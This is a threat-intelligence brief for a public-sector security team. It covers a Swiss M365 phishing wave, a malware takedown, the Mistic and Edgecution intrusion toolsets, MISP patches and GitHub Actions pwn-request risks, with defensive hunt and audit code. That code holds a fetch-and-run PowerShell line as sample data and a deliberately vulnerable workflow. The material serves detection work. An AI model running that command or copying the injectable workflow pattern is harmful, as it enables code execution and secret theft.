On this page
- 0. TL;DR
- 1. Active Threats, Trending Actors, Notable Incidents & Disclosures
- 2. Trending Vulnerabilities
- 3. Research & Investigative Reporting
- 4. Updates to Prior Coverage
- 5. Deep Dive — Edgecution: abusing the Chrome/Edge Native Messaging API as a browser-sandbox-to-host bridge
- 6. Action Items
- 7. Verification Notes
References
- CVE-2026-56447
- CVE-2026-39893
- CVE-2026-56422
- CVE-2026-56423
- CVE-2026-56424
- CVE-2026-56425
- CVE-2026-56446
- CVE-2026-41947
- NCSC-CH Week 25 M365 voicemail phishing wave (CH)
- Operation Endgame — Amadey/StealC MaaS takedown
- Mistic / MLTBackdoor backdoor (Woodgnat/KongTuke IAB)
- Edgecution — Edge extension Native Messaging sandbox-to-host bridge (Payouts Kings)
- Cordyceps — GitHub Actions pull_request_target pwn-request class
- Klue/Icarus Salesforce OAuth-token breach
- BleepingComputer
- ESET WeLiveSecurity
- GitHub Advisory Database
- Help Net Security
- Microsoft Threat Intelligence
- NCSC Switzerland — Im Fokus
- SecurityWeek
0. TL;DR
- Operation Endgame dismantles Amadey and StealC MaaS infrastructure — a Europol-coordinated action on 24 June took down 326 servers and 142 domains, recovered ~27 million stolen credentials from 385,000+ systems and froze EUR 41M (BleepingComputer, 2026-06-24); both families are commodity initial-access and credential-theft stages that feed ransomware affiliates active against European targets (Microsoft, 2026-06-24).
- NCSC-CH flags an active Microsoft 365 "voicemail" phishing wave in Switzerland — Week 25 review documents dual-path ZIP-borne infostealer / fake-login credential theft against M365 tenants, with downstream BEC and chain-phishing once a mailbox is taken; the ZIP-as-audio lure is the key detection discriminator (NCSC-CH, 2026-06-23).
- Two new initial-access-broker toolsets surface — Mistic and Edgecution — Symantec details Mistic, sideloaded via a signed Microsoft Defender binary so its activity reads as legitimate Defender behaviour (Symantec, 2026-06-24); Zscaler details Edgecution, a malicious Edge extension that bridges the browser sandbox to a host Python backdoor via the Native Messaging API (today's deep dive) (Zscaler, 2026-06-23).
- Patch your own tooling — MISP 2.5.42 closes six CVEs including two site-admin RCE paths (rdkafka plugin-load and ndjson log injection) plus Azure-AD auth and access-control hardening, directly affecting the threat-intel platform most EU CERTs/CSIRTs run (MISP, 2026-06-22).
- "Cordyceps" shows the GitHub Actions `pull_request_target` pwn-request class is still widely live — 300+ of 30,000 scanned high-impact repos were fully exploitable from a single PR opened with a free GitHub account, including Microsoft Azure Sentinel and Google's ADK; `actions/checkout` v7 ships safer defaults but workflows pinned to older versions remain exposed (Novee Security, 2026-06-23).
1. Active Threats, Trending Actors, Notable Incidents & Disclosures
NCSC-CH: active Microsoft 365 "voicemail" phishing wave in Switzerland delivers infostealers and harvests M365 credentials
Switzerland's National Cyber Security Centre reported a higher-than-usual volume of a dual-path Microsoft 365 / OneDrive-for-Business phishing campaign in its Week 25 review (NCSC-CH, 2026-06-23). In the malware-delivery variant the email carries a ZIP "audio" attachment that, when run, installs an infostealer harvesting browser credentials, session cookies and wallet data; in the credential-harvest variant a fake Microsoft login page with a simulated audio player ("Play voicemail as guest") captures the M365 username and password. NCSC-CH notes that a compromised mailbox is then used to read live business email and run chain-phishing and BEC fraud from a recognised sender replying inside an existing thread (T1114.003, T1098), and that stolen credentials are frequently resold and resurface in targeted follow-up attacks weeks later.
Why it matters to us: Swiss public-sector staff are direct recipients. The discriminator is mechanical — a legitimate voicemail notification delivers a .wav/.mp3 file, never a ZIP archive. Phishing-resistant MFA (FIDO2 / certificate-based Conditional Access) defeats the credential-theft path even when the lure succeeds, but not the infostealer path, which lifts already-authenticated session cookies from the browser. For that path, hunt M365 audit logs for inbox-rule and forwarding-rule creation within minutes of a sign-in from a new country/ASN, and on confirmed compromise revoke sessions and refresh tokens rather than only resetting the password, since a reset alone does not invalidate a stolen cookie.
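The hunt above, as an added example that is not NCSC-CH's or Microsoft's code: it correlates sign-ins from a network the user has never used with inbox-rule or forwarding changes that follow within a short window. The records are constructed in the shape of Unified Audit Log AuditData (CreationTime, Operation, UserId, ClientIP, Workload, Parameters); `IP_ASN` and `BASELINE` are assumptions standing in for an IP-intelligence lookup and the user's recent sign-in history.

```python
"""Correlate M365 sign-ins from unfamiliar ASNs with inbox-rule / forwarding changes.

Added example, not NCSC-CH's or Microsoft's code. Records are constructed in
Unified Audit Log AuditData shape; IP_ASN and BASELINE are assumptions.
"""
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)            # rule change this soon after a novel sign-in
RULE_OPS = {"New-InboxRule", "Set-InboxRule", "UpdateInboxRules", "Set-Mailbox"}
FORWARD_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                  "ForwardingSmtpAddress", "ForwardingAddress"}
HIDE_PARAMS = {"DeleteMessage", "MoveToFolder", "MarkAsRead", "Name"}

IP_ASN = {"203.0.113.7": "AS64496", "198.51.100.23": "AS64500"}   # assumption: IP-intel lookup
BASELINE = {"alice@example.ch": {"AS64496"},                        # assumption: ASNs seen in 30 days
            "bob@example.ch": {"AS64496"}}

# Constructed audit records (UAL AuditData fields, trimmed to what the hunt needs).
RECORDS = [
    {"CreationTime": "2026-06-22T07:02:11", "Operation": "UserLoggedIn",
     "Workload": "AzureActiveDirectory", "UserId": "alice@example.ch", "ClientIP": "203.0.113.7"},
    {"CreationTime": "2026-06-22T09:14:03", "Operation": "UserLoggedIn",
     "Workload": "AzureActiveDirectory", "UserId": "alice@example.ch", "ClientIP": "198.51.100.23"},
    {"CreationTime": "2026-06-22T09:19:40", "Operation": "New-InboxRule", "Workload": "Exchange",
     "UserId": "alice@example.ch", "ClientIP": "198.51.100.23",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "SubjectContainsWords", "Value": "invoice;payment"},
                    {"Name": "DeleteMessage", "Value": "True"}, {"Name": "MarkAsRead", "Value": "True"}]},
    {"CreationTime": "2026-06-22T09:25:52", "Operation": "Set-Mailbox", "Workload": "Exchange",
     "UserId": "alice@example.ch", "ClientIP": "198.51.100.23",
     "Parameters": [{"Name": "Identity", "Value": "alice"},
                    {"Name": "ForwardingSmtpAddress", "Value": "smtp:alice.backup@example.net"},
                    {"Name": "DeliverToMailboxAndForward", "Value": "True"}]},
    {"CreationTime": "2026-06-22T10:05:00", "Operation": "UserLoggedIn",
     "Workload": "AzureActiveDirectory", "UserId": "bob@example.ch", "ClientIP": "203.0.113.7"},
    {"CreationTime": "2026-06-22T10:07:30", "Operation": "New-InboxRule", "Workload": "Exchange",
     "UserId": "bob@example.ch", "ClientIP": "203.0.113.7",
     "Parameters": [{"Name": "Name", "Value": "Newsletters"}, {"Name": "MoveToFolder", "Value": "Reading"}]},
]


def params(rec: dict) -> dict:
    """Flatten the cmdlet Parameters array into a name -> value map."""
    return {p["Name"]: p["Value"] for p in rec.get("Parameters", [])}


def correlate(records: list[dict]) -> list[dict]:
    """Rule/forwarding changes made within WINDOW after a sign-in from a non-baseline ASN."""
    by_user: dict[str, list[dict]] = {}
    for r in records:
        by_user.setdefault(r["UserId"].lower(), []).append(r)
    alerts = []
    for user, recs in by_user.items():
        recs.sort(key=lambda r: r["CreationTime"])
        novel_logins = []                       # (time, ip, asn) of sign-ins outside the baseline
        for r in recs:
            t = datetime.fromisoformat(r["CreationTime"])
            if r["Operation"] == "UserLoggedIn":
                asn = IP_ASN.get(r.get("ClientIP"), "unknown")
                if asn not in BASELINE.get(user, set()):
                    novel_logins.append((t, r["ClientIP"], asn))
            elif r["Operation"] in RULE_OPS:
                p = params(r)
                if r["Operation"] == "Set-Mailbox" and not (p.keys() & FORWARD_PARAMS):
                    continue                    # some other mailbox setting, not forwarding
                for lt, ip, asn in novel_logins:
                    if timedelta(0) <= t - lt <= WINDOW:
                        alerts.append({"user": user, "op": r["Operation"], "ip": ip, "asn": asn,
                                       "minutes_after": int((t - lt).total_seconds() // 60),
                                       "params": {k: v for k, v in p.items()
                                                  if k in FORWARD_PARAMS | HIDE_PARAMS}})
                        break
    return alerts


if __name__ == "__main__":
    for a in correlate(RECORDS):
        print(a)
```

Bob's rule from his usual network produces nothing; Alice's rule named "." that deletes invoice mail, and the SMTP forward that follows it, both land a few minutes after the novel-ASN sign-in and are reported with the parameters an analyst needs to triage.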
Operation Endgame dismantles the Amadey and StealC malware-as-a-service backbone
A Europol-coordinated law-enforcement and private-sector action on 24 June 2026 took down the shared infrastructure of Amadey and StealC — two of the dominant commodity malware-as-a-service families that form the pre-ransomware infection chain (Microsoft, 2026-06-24 · Europol, 2026-06-24). 326 servers and 142 domains were seized, ~27 million credentials stolen from 385,000+ systems recovered, and EUR 41M in crypto frozen (BleepingComputer, 2026-06-24). Amadey (active since 2018) is a modular C++ loader with 29+ commands, scheduled-task persistence and payload staging; StealC is a C++ infostealer-MaaS harvesting browser credentials, cookies, wallets and desktop clients over RC4-encrypted HTTP. ESET contributed RC4 keys and clustering that identified 53 Amadey and 73 StealC clusters (ESET, 2026-06-24); Proofpoint and IBM X-Force documented a directory-traversal flaw in StealC's C2 panel (its filename sanitiser failed to strip forward-slashes), and an exploit built on it was used by global law enforcement to map and access affiliate infrastructure (Proofpoint/IBM X-Force, 2026-06-24). This is a distinct action from the SocGholish/TA569 phase covered on 2026-06-19.
Why it matters to us: Detecting Amadey delivery (ClickFix fake-CAPTCHA, SEO poisoning) and StealC exfiltration is a real ransomware pre-emption opportunity. Hunt scheduled-task creation (EID 4698) by browser/Office parents from %APPDATA% paths, and browser-process → mshta.exe/wscript.exe chains with temp-path arguments.
"Mistic" backdoor: signed-Defender DLL sideloading and in-memory tradecraft by access broker Woodgnat/KongTuke
Symantec disclosed Backdoor.Mistic (also tracked as MLTBackdoor), deployed since April 2026 by initial-access broker Woodgnat (a.k.a. KongTuke) that sells footholds to ransomware affiliates including Qilin, Interlock, Rhysida, Akira, 8Base and Black Basta (Symantec, 2026-06-24 · SecurityWeek, 2026-06-24). Mistic achieves DLL sideloading via a digitally-signed Microsoft Defender executable (MpExtMs.exe) loading a malicious EndpointDlp.dll (T1574.002, T1036.005), so its activity reads as legitimate Defender behaviour to EDR. Per Symantec it also supports in-memory tradecraft and file manipulation/arbitrary code execution with a kill switch for stealth. Delivery uses ClickFix / FileFix / CrashFix lures (fake CAPTCHAs, browser-crash pages, Teams IT-helpdesk impersonation directing victims to run PowerShell).
Why it matters to us: The downstream affiliates are all active public-sector ransomware actors. Detection is precise: the legitimate EndpointDlp.dll loads from the Defender installation path (%ProgramFiles%\Windows Defender\) under a Microsoft certificate — any EndpointDlp.dll loaded from a user-writable path or carrying a non-Microsoft (or no) signature is high-confidence (Sysmon EID 7), and a signed Defender binary executing from a user profile rather than its install path is an anomaly in its own right. Pair with EID 1 parent-chains for PowerShell spawned by Teams/Office clients.
2. Trending Vulnerabilities
CVE-2026-56447, CVE-2026-56446, CVE-2026-56425, CVE-2026-56424, CVE-2026-56423, CVE-2026-56422 — MISP 2.5.42: two site-admin RCE paths plus Azure-AD auth and broken-access-control hardening
MISP 2.5.42 (released 2026-06-22 by the CIRCL-supported project) is a security-hardening release listing six CVEs in the threat-intelligence platform that most EU national CERTs/CSIRTs run (MISP, 2026-06-22 · GitHub release v2.5.42). The release fixes two remote-code-execution paths: CVE-2026-56447 (CVSS 9.3 per the GitHub advisory) lets a site administrator point Kafka_rdkafka_config at a crafted file that abuses rdkafka's plugin.library.paths to load an attacker-supplied shared library under MISP's process privileges (GHSA-834x-pvxg-xh58); a second RCE comes from arbitrary NDJSON-log paths, now strictly controlled in 2.5.42 (T1505.003). Both require a site-admin account, so the practical risk is post-compromise persistence/lateral movement on a shared instance. The remaining fixes harden Azure-AD authentication and close broken-access-control / mass-assignment issues across MISP's controllers (CVE-2026-56446, CVE-2026-56425, CVE-2026-56424, CVE-2026-56423, CVE-2026-56422); the release notes do not publish per-CVE CVSS scores. A compromised MISP instance exposes a whole community's TLP:AMBER/RED corpus and can be used to inject false indicators — upgrade to 2.5.42, verify file ownership on APP/tmp/ and the web root, and audit the admin trail for Kafka/log-path changes.
3. Research & Investigative Reporting
"Cordyceps" — the GitHub Actions `pull_request_target` pwn-request class is still widely exploitable at scale
Novee Security published "Cordyceps", an empirical study of a long-known but persistently unmitigated class of GitHub Actions CI/CD vulnerabilities (Novee Security, 2026-06-23 · SecurityWeek, 2026-06-24). The pattern: a pull_request_target (or comment-triggered) workflow runs with the base repository's write permissions and secrets while checking out or otherwise consuming untrusted fork-PR content, letting an attacker inject code into a privileged CI context (T1195.002). Of ~30,000 high-impact repositories scanned, 654 were flagged and 300+ confirmed fully exploitable — including Microsoft (Azure Sentinel), Google (AI Agent Development Kit), Apache (Doris), Cloudflare (Workers SDK) and the Python Software Foundation (Black) — with exploitation requiring only a free GitHub account and a single PR. Successful exploitation can yield the org's GitHub App key, cloud repository authority, or the ability to publish attacker-controlled packages to trusted registries. GitHub shipped actions/checkout v7 on 18 June with safer pull_request_target defaults that refuse to fetch fork-PR head commits in unsafe patterns (GitHub Changelog, 2026-06-18), but organisations pinning older action versions or running self-managed Enterprise Server are not yet protected. Audit .github/workflows/*.yml for pull_request_target triggers that reference any ${{ github.event.pull_request.* }} context in run:/env: steps; scope GITHUB_TOKEN to contents: read by default; and split build/test onto the unprivileged pull_request trigger.
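The workflow audit above, as an added example that is not Novee Security's or GitHub's tooling: a standard-library scanner that flags a privileged trigger combined with a checkout of the fork's head, an untrusted expression interpolated into a `run:` script, and a missing or write-scoped `permissions:` block. The two workflows are constructed (one vulnerable, one hardened); the trigger list and the regexes are heuristics, and a production version would parse the YAML properly.

```python
"""Heuristic scanner for the Cordyceps / pwn-request pattern in GitHub Actions workflows.

Added example, not Novee Security's or GitHub's code. Regex-based so it needs only
the standard library; VULNERABLE and HARDENED are constructed workflows.
"""
import re
import textwrap
from dataclasses import dataclass

# Triggers that run with the base repo's token and secrets yet are reachable by outsiders.
PRIVILEGED_TRIGGERS = ("pull_request_target", "issue_comment", "pull_request_review",
                       "pull_request_review_comment", "workflow_run")
# Expression contexts an outside contributor controls (PR title/body/branch, comments).
UNTRUSTED_CTX = re.compile(
    r"\$\{\{\s*github\.(?:head_ref|event\.(?:pull_request|issue|comment|review)\.[\w.]+)\s*\}\}")
# actions/checkout pointed at the fork's head: attacker code runs in the privileged job.
UNSAFE_REF = re.compile(
    r"^\s*ref:\s*\$\{\{\s*github\.(?:head_ref|event\.pull_request\.head\.(?:sha|ref))\s*\}\}")
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")
ENV_ASSIGN = re.compile(r"^\s*[A-Za-z_][A-Za-z0-9_]*:\s*\$\{\{")
WRITE_SCOPE = re.compile(r"^\s*(?:permissions:\s*write-all|[\w-]+:\s*write)\s*$", re.M)


@dataclass
class Finding:
    line: int          # 0 means a whole-file finding
    severity: str      # "high" or "info"
    kind: str
    text: str


def scan_workflow(text: str) -> list[Finding]:
    """Findings for one workflow file; an empty list means nothing was flagged."""
    if not any(re.search(rf"\b{t}\b", text) for t in PRIVILEGED_TRIGGERS):
        return []      # plain pull_request: fork PRs get a read-only token and no secrets
    findings: list[Finding] = []
    run_indent = None  # column of the `run` key while inside a multi-line run: | block
    for no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped:
            continue
        indent = len(line) - len(line.lstrip())
        if run_indent is not None and indent <= run_indent:
            run_indent = None                       # dedented: left the run block
        m = RUN_KEY.match(line)
        if m:
            in_run = True
            if m.group(2).lstrip().startswith(("|", ">")):
                run_indent = len(m.group(1))
        else:
            in_run = run_indent is not None
        if UNSAFE_REF.match(line):
            findings.append(Finding(no, "high", "unsafe-checkout", stripped))
        elif in_run and UNTRUSTED_CTX.search(line):
            findings.append(Finding(no, "high", "script-injection", stripped))
        elif ENV_ASSIGN.match(line) and UNTRUSTED_CTX.search(line):
            # Safe when the step reads it as $VAR and never runs fork code; review it.
            findings.append(Finding(no, "info", "untrusted-env", stripped))
    if not re.search(r"^\s*permissions:", text, re.M):
        findings.append(Finding(0, "high", "broad-permissions",
                                "no permissions: block; GITHUB_TOKEN inherits the repo default"))
    elif WRITE_SCOPE.search(text):
        findings.append(Finding(0, "high", "broad-permissions", "GITHUB_TOKEN granted write scope"))
    return findings


def high_findings(text: str) -> list[Finding]:
    return [f for f in scan_workflow(text) if f.severity == "high"]


VULNERABLE = textwrap.dedent("""\
    name: PR title check
    on:
      pull_request_target:
        types: [opened, synchronize]
    jobs:
      check:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v4
            with:
              ref: ${{ github.event.pull_request.head.sha }}
          - run: |
              echo "Checking ${{ github.event.pull_request.title }}"
              npm ci && npm test
            env:
              NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
    """)

HARDENED = textwrap.dedent("""\
    name: PR title check
    on:
      pull_request_target:
        types: [opened, synchronize]
    permissions:
      contents: read
    jobs:
      check:
        runs-on: ubuntu-latest
        steps:
          - uses: actions/checkout@v7   # base ref only: fork code is never checked out
          - run: echo "Checking $PR_TITLE"
            env:
              PR_TITLE: ${{ github.event.pull_request.title }}
    """)

if __name__ == "__main__":
    for name, wf in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        for f in scan_workflow(wf):
            print(f"{name}: line {f.line} [{f.severity}] {f.kind}: {f.text}")
```

The vulnerable file trips all three high-severity checks; the hardened one keeps the privileged trigger but checks out only the base ref, passes the PR title through an environment variable rather than interpolating it into the script, and pins the token to `contents: read`, leaving a single informational note to review.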
4. Updates to Prior Coverage
UPDATE: Klue/Icarus Salesforce OAuth breach — BeyondTrust and LastPass added to the named-victim list
UPDATE (originally covered 2026-06-19): BeyondTrust and LastPass have both disclosed that business-contact and sales-related data was exfiltrated from their Salesforce environments via the compromised Klue integration, pushing the confirmed named-victim count past 14 (SecurityWeek, 2026-06-24 · Help Net Security, 2026-06-24).
The BeyondTrust exposure is the notable delta: a privileged-access-management vendor losing its CRM contact and support-case data to a SaaS supply-chain compromise illustrates that security-vendor customer lists are a deliberate targeting priority for the Icarus extortion crew. LastPass states customer vaults were not affected. Salesforce had already disabled the Klue Battlecards connection on 17 June (The Hacker News, 2026-06-19). Any organisation receiving a Salesforce "Connected App disabled" notice for Klue should treat it as an incident trigger and audit Event Log File `ApiTotalUsage` / `ApiAnomalyEventStore` records for bulk REST API reads in the June 11–17 window (T1199, T1528, T1213.003).
5. Deep Dive — Edgecution: abusing the Chrome/Edge Native Messaging API as a browser-sandbox-to-host bridge
Background. Browser-extension-to-host pivoting is not a new idea — the Native Messaging API (the stdio IPC channel that lets a browser extension talk to a registered local executable) has been a documented abuse surface for years, and EDR coverage of browser child-processes remains uneven. What Zscaler ThreatLabz documents in Edgecution is this class turned into a working, in-the-wild initial-access toolset operated by the Payouts Kings group (Zscaler ThreatLabz, 2026-06-23 · BleepingComputer, 2026-06-24).
Initial access. The chain begins with a Microsoft Teams social-engineering lure: attackers impersonate IT support and direct the victim to a fraudulent Outlook "update" portal (T1204.002 User Execution: Malicious File, preceded by T1656 impersonation). The download is a ZIP bundling an embedded Python 3.13.3 runtime, a malicious Edge extension presented as an "Edge Monitoring Agent", and the native-messaging host components that register the extension-to-executable channel.
Sandbox-to-host bridge. The extension runs inside a headless (hidden-window) Edge instance invisible to the user (T1564.003 Hide Artifacts: Hidden Window), beacons to C2 hosted on cloudfront.net subdomains over HTTPS (T1071.001 Application Layer Protocol: Web Protocols), and relays received commands across the Native Messaging stdio channel (T1559 Inter-Process Communication) to a Python backdoor running on the host. The design point is evasion: controls that watch the browser process tree but not the native-messaging-host child process never see the host commands cross the boundary.
On-host capability. The Python backdoor (T1059.006 Command and Scripting Interpreter: Python) implements shell and PowerShell command execution, arbitrary code execution, file writes, process enumeration and system reconnaissance — a full IAB foothold from which ransomware affiliates can be sold access. Zscaler reports the observed C2 used cloudfront.net subdomains hosted on AWS, which blend with legitimate CDN traffic.
Hunt and detection concepts. (1) Process-tree rule: msedge.exe spawning a native-messaging host executable followed by a Python interpreter invocation is the kill-chain signature — the host process is registered under HKCU\Software\Microsoft\Edge\NativeMessagingHosts\. (2) Registry monitoring: additions under that key by anything other than a legitimate installer (Sysmon EID 13). (3) Process telemetry: a headless/hidden Edge instance launched outside normal user interaction (Sysmon EID 1, command-line flags indicating an automation/headless profile). (4) Network: CloudFront-subdomain beaconing originating from msedge.exe or a Python child in an environment that does not normally use those endpoints.
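The four hunt concepts above, together with the Mistic sideload and Teams-to-PowerShell rules from § 1, as an added example that is not Zscaler's, Symantec's or Microsoft's tooling: a set of rules run over Sysmon-style events (EID 1 process create, EID 7 image load, EID 13 registry value set). The events are constructed with Sysmon's EventData field names; the Defender install roots, the "installer" allow-list and the process names are assumptions to tune per environment, and Sysmon records HKCU keys under `HKU\<SID>\`, which the registry rule accounts for.

```python
"""Hunt rules over Sysmon-style events for the Mistic sideload and the Edgecution bridge.

Added example, not vendor tooling. EVENTS are constructed; field names follow Sysmon
EventData. DEFENDER_ROOTS, REGISTRY_INSTALLERS and the process-name sets are assumptions.
"""
import ntpath

# Assumption: where a genuine EndpointDlp.dll may live (the brief names %ProgramFiles%\Windows Defender).
DEFENDER_ROOTS = ("c:\\program files\\windows defender\\",
                  "c:\\programdata\\microsoft\\windows defender\\platform\\")
NMH_KEY = "\\software\\microsoft\\edge\\nativemessaginghosts\\"
REGISTRY_INSTALLERS = {"msiexec.exe"}                  # assumption: benign writers of that key
COLLAB_PARENTS = {"ms-teams.exe", "teams.exe", "outlook.exe", "winword.exe", "excel.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def rule_mistic_sideload(ev: dict):
    """EID 7: EndpointDlp.dll loaded from outside the Defender install path or not Microsoft-signed."""
    if ev["EventID"] != 7 or base(ev["ImageLoaded"]) != "endpointdlp.dll":
        return None
    outside_install = not ev["ImageLoaded"].lower().startswith(DEFENDER_ROOTS)
    bad_signature = not (ev.get("SignatureStatus") == "Valid"
                         and ev.get("Signature", "").startswith("Microsoft"))
    return f"{ev['ImageLoaded']} loaded by {ev['Image']}" if outside_install or bad_signature else None


def rule_collab_shell(ev: dict):
    """EID 1: shell or script host spawned by Teams / an Office client (ClickFix, FileFix lures)."""
    if ev["EventID"] == 1 and base(ev["ParentImage"]) in COLLAB_PARENTS and base(ev["Image"]) in SHELLS:
        return f"{base(ev['ParentImage'])} -> {base(ev['Image'])}: {ev['CommandLine']}"
    return None


def rule_nmh_registration(ev: dict):
    """EID 13: Native Messaging host registered per-user (HKU\\<SID>, i.e. HKCU) or by a non-installer."""
    if ev["EventID"] != 13 or NMH_KEY not in ev["TargetObject"].lower():
        return None
    per_user = ev["TargetObject"].upper().startswith("HKU\\")
    if per_user or base(ev["Image"]) not in REGISTRY_INSTALLERS:
        return f"{ev['TargetObject']} written by {ev['Image']}"
    return None


def rule_edge_bridge_chain(events: list[dict]) -> list[str]:
    """EID 1 lineage: a python* process whose ancestry (up to 3 hops) passes through msedge.exe."""
    by_guid = {ev["ProcessGuid"]: ev for ev in events if ev["EventID"] == 1}
    hits = []
    for ev in by_guid.values():
        if not base(ev["Image"]).startswith("python"):
            continue
        chain, cur = [base(ev["Image"])], ev
        for _ in range(3):
            cur = by_guid.get(cur.get("ParentProcessGuid"))
            if cur is None:
                break
            chain.insert(0, base(cur["Image"]))
            if chain[0] == "msedge.exe":
                headless = " (headless)" if "--headless" in cur["CommandLine"] else ""
                hits.append(" -> ".join(chain) + headless)
                break
    return hits


def hunt(events: list[dict]) -> list[tuple[str, str]]:
    findings = []
    for ev in events:
        for rule in (rule_mistic_sideload, rule_collab_shell, rule_nmh_registration):
            hit = rule(ev)
            if hit:
                findings.append((rule.__name__, hit))
    findings += [("rule_edge_bridge_chain", h) for h in rule_edge_bridge_chain(events)]
    return findings


# Constructed events: one benign Defender load, then the two intrusion patterns.
EVENTS = [
    {"EventID": 7, "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26050.4\MsMpEng.exe",
     "ImageLoaded": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26050.4\EndpointDlp.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Roaming\DefenderUpdate\MpExtMs.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\DefenderUpdate\EndpointDlp.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 1, "ProcessGuid": "{p1}", "ParentProcessGuid": "{p0}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\MSTeams_24.1.0.0_x64__8wekyb3d8bbwe\ms-teams.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c iwr https://example.invalid/fix | iex"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\EdgeMonitor\setup.exe",
     "TargetObject": r"HKU\S-1-5-21-10-20-30-1001\Software\Microsoft\Edge\NativeMessagingHosts\com.edgemonitor.agent\(Default)"},
    {"EventID": 1, "ProcessGuid": "{e1}", "ParentProcessGuid": "{d1}",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\EdgeMonitor\setup.exe",
     "CommandLine": r"msedge.exe --headless=new --load-extension=C:\Users\alice\AppData\Local\EdgeMonitor\ext --user-data-dir=C:\Users\alice\AppData\Local\EdgeMonitor\profile"},
    {"EventID": 1, "ProcessGuid": "{e2}", "ParentProcessGuid": "{e1}",
     "Image": r"C:\Users\alice\AppData\Local\EdgeMonitor\host.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": "host.exe chrome-extension://abcdefghijklmnopabcdefghijklmnop/"},
    {"EventID": 1, "ProcessGuid": "{e3}", "ParentProcessGuid": "{e2}",
     "Image": r"C:\Users\alice\AppData\Local\EdgeMonitor\python\python.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\EdgeMonitor\host.exe",
     "CommandLine": "python.exe agent.py"},
]

if __name__ == "__main__":
    for rule, detail in hunt(EVENTS):
        print(f"{rule}: {detail}")
```

The genuine Defender load passes both the path and signature checks; the copied MpExtMs.exe loading an unsigned EndpointDlp.dll from a roaming profile, the Teams-spawned PowerShell, the per-user Native Messaging registration and the headless msedge.exe -> host.exe -> python.exe lineage each produce one finding. The lineage rule is the one that survives the evasion described above, because it keys on the process tree rather than on the browser process alone.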
Hardening. Enterprise browsers should restrict extension installation to approved publisher IDs via Group Policy (ExtensionInstallAllowlist together with BlockExternalExtensions) and allow-list Native Messaging hosts explicitly (NativeMessagingAllowlist). Setting the NativeMessagingUserLevelHosts policy to disabled makes the browser ignore per-user (HKCU) host registrations altogether, which removes this bridging and persistence path even if the dropper writes the key; AppLocker/WDAC then stops the host executable and the bundled Python runtime from running out of a user-writable profile path. Because the entry point is a Teams IT-helpdesk lure, the same control that blunts ClickFix/FileFix — preventing users from running attacker-supplied scripts and constraining who can deliver Teams messages from outside the tenant — applies here too.
6. Action Items
- Upgrade MISP to 2.5.42 now if you run a MISP instance — six CVEs including two site-admin RCE paths (rdkafka plugin-load CVE-2026-56447, CVSS 9.3; and an ndjson log-path RCE). Verify file ownership on `APP/tmp/` and the web root and audit the admin trail for Kafka/log-path changes. (See § 2.)
- Audit GitHub Actions workflows for the Cordyceps pattern — flag every `pull_request_target` trigger that consumes `${{ github.event.pull_request.* }}` content; adopt `actions/checkout` v7 or pin a safe configuration; scope `GITHUB_TOKEN` to `contents: read`; rotate secrets in affected repos. (See § 3.)
- Hunt for signed-Defender DLL sideloading (Mistic) — alert on `EndpointDlp.dll` loaded from a user-writable path or with a non-Microsoft signature (Sysmon EID 7), and on PowerShell spawned by Teams/Office clients. (See § 1.)
- Hunt for Native-Messaging bridging (Edgecution) — `msedge.exe` → native-messaging host → Python interpreter chains, and `HKCU\...\Edge\NativeMessagingHosts\` additions by non-installers; allow-list extensions and native-messaging hosts via Group Policy / WDAC. (See § 5.)
- Reinforce M365 phishing controls (NCSC-CH wave) — flag ZIP attachments masquerading as voicemail audio, enforce phishing-resistant MFA via Conditional Access, and hunt inbox-rule / forwarding-rule creation shortly after sign-ins from new countries/ASNs. (See § 1.)
- Audit Salesforce connected-app OAuth tokens (Klue/Icarus) — review Event Log File `ApiTotalUsage` / `ApiAnomalyEventStore` for bulk REST reads in the June 11–17 window and minimise token scopes. (See § 4.)
7. Verification Notes
- Items dropped:
- DifyTap (Dify cross-tenant flaws, CVE-2026-41947 / -41948 / -41949 / -41950) — already evaluated and dropped to § 7 on 2026-06-23; the grounds still hold (all paths require an authenticated editor/tenant account, no in-the-wild exploitation), so it does not clear the § 2 inclusion bar despite a stronger primary (Zafran) now being available.
- OXLoader (Elastic Security Labs) — single-substantive-source and surfaced by two sub-agents with conflicting publication dates (19 vs 23 June) and conflicting technical descriptions (`.reloc`-section shellcode staging + anti-VM checks vs. process-hollowing + clipper); dropped pending a single reconcilable account.
- Mini-Shai-Hulud / Miasma / Hades PyPI worm wave (Socket Security) — the substantive primary is dated 8 June, outside the 36 h window (one sub-agent's 24 June date appears to be the date of a Schneier commentary follow-up, not the primary); the Shai-Hulud family has prior coverage, so this is held for a cleaner in-window development.
- DoJ seizure of Huione Group laundering infrastructure ($31B) — significant law-enforcement action but no patch/hunt/block/detect decision for a public-sector SOC; out of scope under less-is-more.
